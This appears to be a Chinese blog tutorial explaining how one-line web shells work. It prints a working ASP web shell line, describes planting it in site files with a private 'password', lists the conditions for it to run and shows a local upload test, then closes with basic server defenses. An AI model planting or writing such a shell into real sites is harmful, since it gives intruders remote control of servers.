對于做網(wǎng)絡(luò )安全方面的人來(lái)說(shuō),一句話(huà)木馬肯定是不陌生的,一句話(huà)木馬可以說(shuō)是最常見(jiàn)也是最簡(jiǎn)單的木馬了,小編今天簡(jiǎn)單的講解一句話(huà)木馬的工作原理。 其實(shí)也非常的簡(jiǎn)單~ 一句話(huà)木馬就是一段話(huà),很短的一句話(huà)。一句話(huà)木馬分為asp、php、aspx等常見(jiàn)的一句話(huà)木馬, 還有更加繁瑣的加密一句話(huà)木馬,這里就不細講了。
一句話(huà)木馬入侵原理
<%execute request(“#”)%>
是典型的一句話(huà)木馬服務(wù)端代碼,將這個(gè)代碼寫(xiě)入asp文件,就成了一句話(huà)木馬服務(wù)端文件。
仔細觀(guān)察一下<%execute request(“#”)%>這句代碼,括號里的“#”是我們一句話(huà)的密碼,我們可以把它改成任意字符,這樣可以避免別人發(fā)現我們的一句話(huà)木馬后,輕松的通過(guò)它撿個(gè)大便宜,如果我們上傳的一句話(huà)代碼為<%execute request(“123456″)%>。那么在客戶(hù)端連接文件里要將textarea name=”#”將其改為對應的textarea name=“123456”,才能連接成功。
一句話(huà)木馬工作的原理:
將一句話(huà)木馬插入到asp文件中(包括asa.cdx.cer文件),該語(yǔ)句將會(huì )作為觸發(fā),接收入侵者通過(guò)客戶(hù)端提交的數據,執行并完成相應的入侵操作。
客戶(hù)端則用來(lái)向服務(wù)端提交控制數據,提交的數據通過(guò)服務(wù)端構成完整的asp功能語(yǔ)句并執行,也就是生成我們所需要的asp木馬文件。
一句話(huà)木馬能連接成功有兩個(gè)前提條件:
一、服務(wù)器端沒(méi)有禁止Adodb.Stream組件,因為我們使用一句話(huà)木馬寫(xiě)入WebShell代碼的條件是服務(wù)器端創(chuàng )建Adodb.Stream組件,如果該組件被禁用的話(huà)無(wú)法寫(xiě)入。
二、權限問(wèn)題,如果當前的虛擬目錄禁止user組或者everyone寫(xiě)入,同樣不會(huì )成功。
看不懂上面的往下看
1、這是一個(gè)php文件,里面就一段話(huà)。就是我們所說(shuō)的一句話(huà)木馬
2、然后我把他上傳到網(wǎng)站里面(本地菜刀測試)
3、檢測連接狀態(tài)已經(jīng)可以連接進(jìn)入了
那么如何防范一句話(huà)木馬呢?
1、服務(wù)器裝安全殺毒軟件例如:安全狗、360、護衛神等。
2、定期給服務(wù)器進(jìn)行備份,防止被黑客入侵造成數據丟失。
3、禁止服務(wù)器里相關(guān)的權限,例如禁止寫(xiě)入PHP等最基本防護手法。